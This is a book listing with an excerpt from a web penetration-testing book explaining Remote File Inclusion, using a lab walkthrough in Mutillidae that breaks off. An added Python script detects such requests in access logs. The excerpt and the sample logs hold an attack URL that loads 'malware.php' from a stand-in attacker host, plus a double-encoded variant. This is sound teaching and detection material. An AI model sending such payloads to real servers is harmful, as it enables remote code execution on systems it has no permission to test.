Practical Web Penetration Testing

by Gus Khawaja
June 2018
Intermediate to advanced
294 pages
7h 5m
English
Packt Publishing

Remote File Inclusion

Remote File Inclusion (RFI) is exploited by placing in the URL a file path that points to a remote file outside the boundaries of the web server that hosts the web application.

Consider the following example:

http://domain_name/index.php?file=http://hacker_domain/malware.php

In the preceding URL, the victim server will load the malware.php page that resides on the hacker's server. Let's see a practical example using Mutillidae:

  1. Browse to the Mutillidae homepage and select OWASP 2017. We will choose the same menu that we used previously for the Local File Inclusion, that is, Broken Access Control | Insecure Direct Object References | Arbitrary File Inclusion.
  2. So, it's the same page that we tested for the Local File ...
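
One way to spot the request pattern shown in the URL above in web server access logs, as an added example that is not code from the book. The log lines, IP addresses and function names are constructed for illustration; the hostnames reuse the placeholders from the URL above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A value that starts with a remote scheme or is protocol-relative (//host/...).
REMOTE_VALUE = re.compile(r"\s*(?:(?:https?|ftps?):)?//[^/\s]", re.IGNORECASE)
# Request line inside a combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, placeholder hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2018:10:00:00 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jun/2018:10:00:05 +0000] "GET /index.php?file=http://hacker_domain/malware.php HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jun/2018:10:00:09 +0000] "GET /index.php?file=%2568ttp%253A%252F%252Fhacker_domain%252Fmalware.php HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jun/2018:10:00:12 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 900',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %2568ttp) up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_params(target):
    """Return [(name, decoded_value)] for query parameters that point at a remote URL."""
    hits = []
    # parse_qsl performs the first round of percent-decoding itself.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = fully_decode(value)
        if REMOTE_VALUE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Yield (line_number, parameter, value) for each request carrying a remote URL."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        for name, value in remote_params(match.group("target")):
            yield number, name, value

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit is a triage signal rather than proof of inclusion: parameters such as redirect targets legitimately carry URLs, so review which script handles the flagged parameter.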
ISBN: 9781788624039